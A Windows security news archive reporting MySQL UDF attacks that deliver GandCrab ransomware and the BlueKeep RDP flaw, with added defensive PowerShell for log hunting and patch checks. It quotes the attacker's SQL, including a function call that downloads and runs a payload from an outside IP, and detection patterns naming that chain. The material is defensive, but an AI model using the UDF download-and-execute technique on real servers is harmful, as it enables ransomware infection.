Category Archives: Windows

Hackers target MySQL databases to deliver the GandCrab ransomware

Security experts at Sophos have detected a wave of attacks targeting Windows servers that are running MySQL databases with the intent of delivering the GandCrab ransomware

Sophos researchers have observed a wave of attacks targeting Windows servers that are running MySQL databases; the threat actors aim to deliver the GandCrab ransomware.

This is the first time the company has seen attackers target Windows servers running MySQL instances in order to infect them with ransomware.

The experts discovered the attacks because they hit one of the company’s honeypots, which emulates a MySQL server listening on the default TCP port 3306.

The attackers first connect to the database server and establish that it is running a MySQL instance. Everything that follows is ordinary SQL issued over that connection, so the attacker must already hold an account that is allowed to write files on the server and to create functions.

Next, the attacker uses the SET command to load all the bytes of a helper DLL into a session variable, and writes the contents of that variable into a database table named yongger2.

The attacker then has the server concatenate those bytes into a single file and write it into the server’s plugin directory, the only location from which MySQL will load a library named in a SONAME clause. Analysis of the DLL revealed that it exports the functions xpdl3, xpdl3_init and xpdl3_deinit, which are the main, init and deinit entry points MySQL expects from a user-defined function (UDF) library.

The attacker then drops the yongger2 table and, if one already exists, the function xpdl3. At this point the attacker uses the following SQL command to create a database function (also named xpdl3) that is backed by the DLL:

CREATE FUNCTION xpdl3 RETURNS STRING SONAME 'cna12.dll'

The command to invoke the xpdl3 function is:

select xpdl3('hxxp://172.96.14.134:5471/3306-1[.]exe','c:\\isetup.exe') 

With this call, the attacker makes the database server download the GandCrab payload from the remote machine, drop it in the root of the C: drive as isetup.exe and execute it. Because a UDF runs inside the mysqld process, the payload is fetched and launched with whatever privileges the MySQL service itself runs under.
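The chain above, turned into something a defender can run on a Windows MySQL host. This is an added example, not code from the original post or from Sophos: one PowerShell function scans MySQL general-log lines for the four steps of the UDF technique (a hex blob loaded into a session variable, the blob written out as a .dll, a CREATE FUNCTION ... SONAME binding a function to that library, and the new function being called with a URL argument), and a second helper inventories the DLLs in the plugin directory. The log lines are constructed to resemble general-log entries for this session, the dumpfile statement and column name are assumptions about how the bytes were written out, and the plugin directory path is an installation default to adjust.

```powershell
# Added example (not from the original post or from Sophos): hunt for the
# MySQL UDF staging chain on a Windows MySQL host. PowerShell 2.0 or later.

# One rule per step of the chain. Any hit deserves a look; all four from the
# same session within seconds is the pattern described in the post.
$udfRules = @(
    @{ Name    = 'hex blob loaded into session variable'
       Pattern = 'SET\s+@\w+\s*=\s*(?:CONCAT\s*\(\s*''''\s*,\s*)?0x[0-9A-F]{32,}' },
    @{ Name    = 'blob written out as a .dll'
       Pattern = 'INTO\s+(?:DUMP|OUT)FILE\s+''[^'']+\.dll''' },
    @{ Name    = 'UDF created from a library (SONAME)'
       Pattern = 'CREATE\s+FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\s+''[^'']+''' },
    @{ Name    = 'UDF called with a URL argument'
       Pattern = 'SELECT\s+\w+\s*\(\s*''(?:hxxp|https?|ftp)://' }
)

function Find-MysqlUdfStaging {
    param([string[]]$LogLines)
    $hits = @()
    for ($i = 0; $i -lt $LogLines.Count; $i++) {
        foreach ($rule in $udfRules) {
            # -match is case-insensitive, which suits the mixed-case SQL seen in logs
            if ($LogLines[$i] -match $rule.Pattern) {
                $hits += New-Object PSObject -Property @{
                    Line = $i + 1
                    Rule = $rule.Name
                    Text = $LogLines[$i].Trim()
                }
            }
        }
    }
    $hits
}

function Get-MysqlPluginLibraries {
    # Everything MySQL could load via SONAME lives here: a recently written,
    # unsigned DLL that is not part of the installation is the thing to explain.
    param([string]$PluginDir)
    Get-ChildItem -Path $PluginDir -Filter *.dll | ForEach-Object {
        New-Object PSObject -Property @{
            Name      = $_.Name
            LastWrite = $_.LastWriteTime
            Signature = (Get-AuthenticodeSignature -FilePath $_.FullName).Status
        }
    }
}

# Constructed sample: general-log style lines approximating the session in the
# post (session 12), followed by one unrelated query. The "select ... into
# dumpfile" statement and the column name are assumptions.
$sampleLog = @(
    '2019-05-19T12:00:01.000000Z    12 Connect   root@203.0.113.7 on  using TCP/IP',
    '2019-05-19T12:00:01.100000Z    12 Query     set @a = concat('''', 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000)',
    '2019-05-19T12:00:01.200000Z    12 Query     insert into yongger2 values(@a)',
    '2019-05-19T12:00:01.300000Z    12 Query     select data from yongger2 into dumpfile ''C:\\Program Files\\MySQL\\MySQL Server 5.7\\lib\\plugin\\cna12.dll''',
    '2019-05-19T12:00:01.400000Z    12 Query     drop table yongger2',
    '2019-05-19T12:00:01.500000Z    12 Query     CREATE FUNCTION xpdl3 RETURNS STRING SONAME ''cna12.dll''',
    '2019-05-19T12:00:01.600000Z    12 Query     select xpdl3(''hxxp://172.96.14.134:5471/3306-1[.]exe'',''c:\\isetup.exe'')',
    '2019-05-19T12:05:00.000000Z    13 Query     select * from orders where id = 42'
)

Find-MysqlUdfStaging -LogLines $sampleLog | Select-Object Line, Rule, Text | Format-Table -AutoSize

# On a real host, feed in the actual log and look at the plugin directory, e.g.:
# Find-MysqlUdfStaging -LogLines (Get-Content 'C:\ProgramData\MySQL\MySQL Server 5.7\Data\general.log')
# Get-MysqlPluginLibraries -PluginDir 'C:\Program Files\MySQL\MySQL Server 5.7\lib\plugin' | Sort-Object LastWrite -Descending
```

Against the sample, lines 2, 4, 6 and 7 each fire one rule; the same session ID within a few seconds is the strong signal, and a CREATE FUNCTION ... SONAME issued by a remote client is rarely benign. The URL rule will also match legitimate queries such as select concat('http://..., so expect to tune it. The preconditions are worth closing as well: the whole chain is plain SQL, so the attacker needs an account with the FILE privilege and the right to create functions. Not exposing port 3306 to the internet, setting secure_file_priv to a directory other than plugin_dir (or to NULL, which disables INTO DUMPFILE/OUTFILE entirely), and keeping the plugin directory read-only for the MySQL service account each remove a link of the chain.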

According to Sophos, at least one Chinese threat actor is currently carrying out attacks of this kind, scanning the internet for Windows servers that are running MySQL databases.

“This particular attack transpired over just a few seconds at about midday, local time, on Sunday, May 19th.” reads the analysis published by Sophos.

“But the URL where the file originated bears some scrutiny. It pointed to an open directory on a web server running server software called HFS, which is a Windows-based web server in the form of a single application.”

“What makes this interesting is that the IP address of this machine hosting the GandCrab sample geolocates to Arizona, in the desert southwest region of the United States, and the user interface of the HFS installation on this machine is in simplified Chinese.”

The analysis of the server allowed the experts to determine the number of times the ransomware was downloaded.

The GandCrab sample that hit the honeypot had been downloaded more than 500 times. It was not the only sample on the server: counted together, the experts estimated nearly 800 downloads in five days, plus more than 2,300 downloads of another GandCrab sample hosted in the same open directory.

“The server appears to indicate more than 500 downloads of the sample I saw the MySQL honeypot download (3306-1.exe). However, the samples named 3306-2.exe, 3306-3.exe, and 3306-4.exe are identical to that file,” continues the analysis.

“Counted together, there have been nearly 800 downloads in the five days since they were placed on this server, as well as more than 2300 downloads of the other (about a week older) GandCrab sample in the open directory.”

The researchers pointed out that this is not a massive or widespread campaign, but it represents a serious risk to administrators who have exposed their MySQL installations to the internet.


If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – MySQL databases, GandCrab)

The post Hackers target MySQL databases to deliver the GandCrab ransomware appeared first on Security Affairs.

PoC Exploits for CVE-2019-0708 wormable Windows flaw released online

Several security experts have developed PoC exploits for wormable Windows RDS flaw tracked as CVE-2019-0708 and dubbed BlueKeep.

Experts have developed several proof-of-concept (PoC) exploits for the recently patched Windows Remote Desktop Services (RDS) vulnerability tracked as CVE-2019-0708 and dubbed BlueKeep.

One of the PoC exploits could be used for remote code execution on vulnerable systems.

Microsoft’s Patch Tuesday updates for May 2019 address nearly 80 vulnerabilities, including a Windows zero-day flaw and an RDS vulnerability that could be exploited to carry out WannaCry-like attacks.

The issue is a remote code execution flaw in Remote Desktop Services (RDS) that can be exploited by an unauthenticated attacker who connects to the targeted system over RDP and sends specially crafted requests.

As Microsoft explained, the vulnerability can be exploited without any user interaction, which makes it wormable: malware that exploits it could spread in an uncontrolled way from one vulnerable host to the next across a target network.

The vulnerability doesn’t affect Windows 8 or Windows 10; earlier versions, however, are exposed.

Microsoft also advised Windows Server users to block TCP port 3389 at the perimeter firewall and to enable Network Level Authentication (NLA), so that an attacker has to authenticate before the vulnerable code path can be reached.

The issue poses a serious risk to organizations and industrial environments, given the large number of systems that expose RDS.
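The guidance above as a host check. This is an added example, not code from the original post, from Microsoft or from the researchers quoted: it reports whether the host is an affected Windows version, whether RDP is enabled and listening on TCP 3389, whether NLA is required, and whether a May 2019 update is installed; with -Fix it enables NLA and, with -BlockPort, adds a local firewall rule for inbound 3389. The KB numbers are an assumption for Windows 7 SP1 / Windows Server 2008 R2 SP1 and must be confirmed against Microsoft’s advisory for CVE-2019-0708 before being relied on; the netstat parsing assumes English output.

```powershell
# Added example (not from the original post or from Microsoft): audit a Windows
# host against CVE-2019-0708 (BlueKeep) and optionally apply the mitigations
# Microsoft recommended. Run from an elevated PowerShell prompt; PowerShell 2.0
# compatible so it can be run on stock Windows 7 / Server 2008 R2.
param(
    [switch]$Fix,        # apply mitigations instead of only reporting
    [switch]$BlockPort,  # with -Fix: add a Windows Firewall rule blocking inbound TCP 3389
    # Assumption: May 2019 security-only and monthly-rollup updates for
    # Windows 7 SP1 / Server 2008 R2 SP1. Confirm the KB numbers for your OS
    # version in Microsoft's CVE-2019-0708 advisory.
    [string[]]$PatchKBs = @('KB4499175', 'KB4499164')
)

$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$tcpKey = "$tsKey\WinStations\RDP-Tcp"

# Per Microsoft, Windows 8 (NT 6.2) and later are not affected.
$osVersion  = [System.Environment]::OSVersion.Version
$affectedOS = $osVersion -lt [version]'6.2'

$rdpEnabled  = (Get-ItemProperty -Path $tsKey).fDenyTSConnections -eq 0
$nlaRequired = (Get-ItemProperty -Path $tcpKey).UserAuthentication -eq 1
# English netstat output assumed for the LISTENING keyword.
$listening3389 = [bool](netstat -an | Select-String -Pattern ':3389\s+\S+\s+LISTENING')
$patched = [bool](Get-HotFix -Id $PatchKBs -ErrorAction SilentlyContinue)

$report = New-Object PSObject -Property @{
    OSVersion      = $osVersion.ToString()
    AffectedOS     = $affectedOS
    RdpEnabled     = $rdpEnabled
    Listening3389  = $listening3389
    NlaRequired    = $nlaRequired
    PatchInstalled = $patched
    # NLA only forces authentication before the flaw is reachable; an attacker
    # with valid credentials can still exploit an unpatched host. Patching is the fix.
    NeedsPatch     = $affectedOS -and -not $patched
}
$report | Select-Object OSVersion, AffectedOS, RdpEnabled, Listening3389, NlaRequired, PatchInstalled, NeedsPatch

if ($Fix) {
    if (-not $nlaRequired) {
        Set-ItemProperty -Path $tcpKey -Name UserAuthentication -Value 1 -Type DWord
        Write-Output 'Network Level Authentication is now required for RDP-Tcp.'
    }
    if ($BlockPort) {
        netsh advfirewall firewall add rule name="Block inbound RDP 3389 (CVE-2019-0708)" dir=in action=block protocol=TCP localport=3389 | Out-Null
        Write-Output 'Inbound TCP 3389 is now blocked in Windows Firewall (this also blocks legitimate RDP).'
    }
}
```

Run it as Administrator on each host: with no switches it only reports, -Fix turns on NLA, and -Fix -BlockPort also blocks the port locally (do that only where RDP is not needed, or after confirming another management path). NeedsPatch is the field that matters: NLA and the port block raise the bar, but only the update removes the flaw.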

Not all of the publicly released exploits are fully working: some of them only trigger the vulnerable code path without causing any further damage.

Experts at the SANS Institute observed two partial exploits that are publicly available.

“Several security vendors stated publicly that they developed exploits internally that will at least trigger a denial of service condition (blue screen). Currently, there are at least two public partial exploits.” reads the blog post published by the SANS Institute, “One triggers the “vulnerable path” without triggering a blue screen or causing any other damage. It can be adjusted to play with the “channel” parameter to create normal and exploit traffic. The second one also triggers the vulnerability without any intended ill effect. The second exploit has been made available in the form of a stand-alone vulnerability scanner.”

Some researchers, however, have created exploits that achieve remote code execution on vulnerable systems.

CVE-2019-0708 exploit code

Chaouki Bekrar, the founder of zero-day broker firm Zerodium, explained that the flaw can be exploited remotely by an unauthenticated user to gain access to a device with SYSTEM privileges.

Researchers at McAfee developed a PoC exploit that achieves remote code execution.

Experts believe it is just a matter of time before threat actors exploit the flaw in the wild.

“Right now, it is only a matter of time until someone publishes a working exploit or a malware author starts selling one on the underground markets. Should that happen, it will probably become very popular among less skilled cybercriminals and also a lucrative asset for its originator,” reads the post published by ESET.

“BlueKeep will also show if organizations around the world learned a lesson after the large 2017 outbreaks and improved their security posture and patching routines.”



Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2019-0708 )

The post PoC Exploits for CVE-2019-0708 wormable Windows flaw released online appeared first on Security Affairs.

If you haven’t yet patched the BlueKeep RDP vulnerability, do so now

There is still no public, working exploit code for CVE-2019-0708, a flaw that could allow an unauthenticated remote attacker to execute arbitrary code on a vulnerable target running Remote Desktop Protocol (RDP). But, as many infosec experts have noted, we’re not far off from when one is created and leveraged by attackers in the wild. With the vulnerability being wormable, when it hits, the exploit could end up compromising millions of systems around the world, … More

The post If you haven’t yet patched the BlueKeep RDP vulnerability, do so now appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or by configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can still be downloaded, but is no longer supported. This newest version (v2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Analysis of device data shines a light on cybersecurity risks in healthcare

The convergence of IT, IoT and OT makes it more difficult for the healthcare industry to manage a wide array of hard-to-control network security risks. IoT and OT devices are rapidly increasing in numbers, but traditional IT still represents the most vulnerable attack surface, according to the Forescout Technologies report. Forescout Technologies announced insights from 75 real healthcare deployments with more than 10,000 virtual local area networks (VLANs) and 1.5 million devices contained within the … More

The post Analysis of device data shines a light on cybersecurity risks in healthcare appeared first on Help Net Security.

Microsoft Warns WannaCry-like Windows Attack

Microsoft is warning users of older versions of Windows to install the Windows Update immediately to protect against potential widespread attacks. The software giant has fixed a vulnerability in Remote Desktop Services on Windows XP, Windows 7, and server versions including Windows Server 2003, Windows Server 2008 R2, and Windows Server 2008. Microsoft took the unusual step of releasing patches for Windows XP and Windows Server 2003 even though both operating systems are no longer supported. Windows XP users must manually download the updates from the Microsoft Update Catalog.

“This vulnerability is pre-authentication and requires no user interaction,” explains Simon Pope, director of incident response at Microsoft’s Security Response Center. “In other words, the vulnerability is ‘virus’, meaning that any future malware that exploits this vulnerability could propagate from vulnerable computer to vulnerable computer in a similar way as the WannaCry malware spread across the globe in 2017.”

Microsoft said it has not observed exploitation of this vulnerability. However, now that the patch has been released, it is only a matter of time before attackers reverse-engineer Microsoft’s patches and create malware. Fortunately, Windows 8 and Windows 10 computers are not affected by this vulnerability. Although Windows 10 is now more popular than Windows 7, there are still millions of computers running Windows 7, which could make an attack very damaging.

Microsoft last broke its tradition of not patching unsupported Windows versions in 2017, when thousands of computers in more than 100 countries were hit by the malware known as WannaCry. That malware used a bug in older versions of Windows to encrypt the computer and demanded a $300 ransom to unlock it. Microsoft is keen to avoid another WannaCry, even though it states that “the best way to resolve this vulnerability is to upgrade to the latest version of Windows.”

Source: https://www.theverge.com/2019/5/14/18623565/microsoft-windows-xp-remote-desktop-services-worm-security-patches


The post Microsoft Warns WannaCry-like Windows Attack appeared first on .

Microsoft plugs wormable RDP flaw, new speculative execution side channel vulnerabilities

For May 2019 Patch Tuesday, Microsoft has released fixes for 79 vulnerabilities, 22 of which are deemed critical. Among the fixes is that for CVE-2019-0708, a “wormable” RDP flaw that is expected to be weaponised by attackers very soon. About CVE-2019-0708 It’s a remote code execution vulnerability in Remote Desktop Services (formerly known as Terminal Services) that allows unauthenticated attackers to connect to the target system using RDP and send specially crafted requests. The flaw … More

The post Microsoft plugs wormable RDP flaw, new speculative execution side channel vulnerabilities appeared first on Help Net Security.

How do I buy a laptop with an encrypted hard drive?

Derek needs to find a laptop with Windows 10 Home’s device encryption to keep his data safe

I want to buy a new Windows 10 laptop for home use, and I want one with device encryption capability, so that the boot drive is encrypted. Until recently, this has only been possible with Windows Professional editions using BitLocker. I now see that if a laptop has the right specification, all versions of Windows 10 can have device encryption turned on.

The problem is that it’s difficult, if not impossible, to get information from mainstream laptop vendors as to whether a specific model supports device encryption. Recent MacBooks are capable of using FileVault and Apple spells out which models support it, so why is this information so hard to find for Windows laptops? Derek

I’m glad you asked because you’re right: there’s a shocking lack of information about device encryption on laptops, and this applies to Microsoft, to PC manufacturers, and to retailers. It’s also something that laptop PC reviewers rarely seem to mention, which makes it hard, if not impossible, to tell how many laptops are compatible with Windows 10’s device encryption.

Continue reading...

How do I stop old USB drives from infecting my new Windows PC?

Jason wants to protect his new high-end laptop from viruses but needs data on old SD cards

I’ve just bought a high-end Windows laptop for video editing while travelling around Europe. What steps can I take to prevent any possible infections from being passed on from previous machines on SD cards and external hard drives? Some of the external hard drives go back to machines from 2004 but I have never plugged any of them into any computers other than my own previous Macs and PCs. I work professionally with video, photography and coding, so all of this data is vital.

I have a five-machine Bitdefender licence but I’d be prepared to use another protection system, and I’ve looked at Sophos Intercept X. Jason

There are at least three things to think about. First, there’s the threat level: how at risk are you? Second, there’s provenance: how much do you know about your devices? Third, how can you mitigate any risks revealed by the answers to the first two questions?

Continue reading...